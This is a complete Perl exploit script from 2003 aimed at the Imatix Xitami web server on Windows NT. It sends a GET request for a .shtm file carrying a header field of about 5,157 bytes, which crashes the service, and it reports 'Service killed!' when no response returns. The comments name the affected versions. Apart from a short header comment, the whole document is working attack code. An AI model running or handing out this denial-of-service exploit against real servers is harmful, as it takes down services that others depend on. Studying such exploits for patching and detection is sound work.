#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT  
#
# Sending a GET request for a *.shtm file with a header field of >= 5154 
# bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de

use IO::Socket;

$ip="127.0.0.1";
$port=80;

$var="A" x 5157;

$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, 
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
  print $mySocket "GET /test.shtm HTTP/1.0\r\n".
        $var.": */*\r\n\r\n"; 

@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;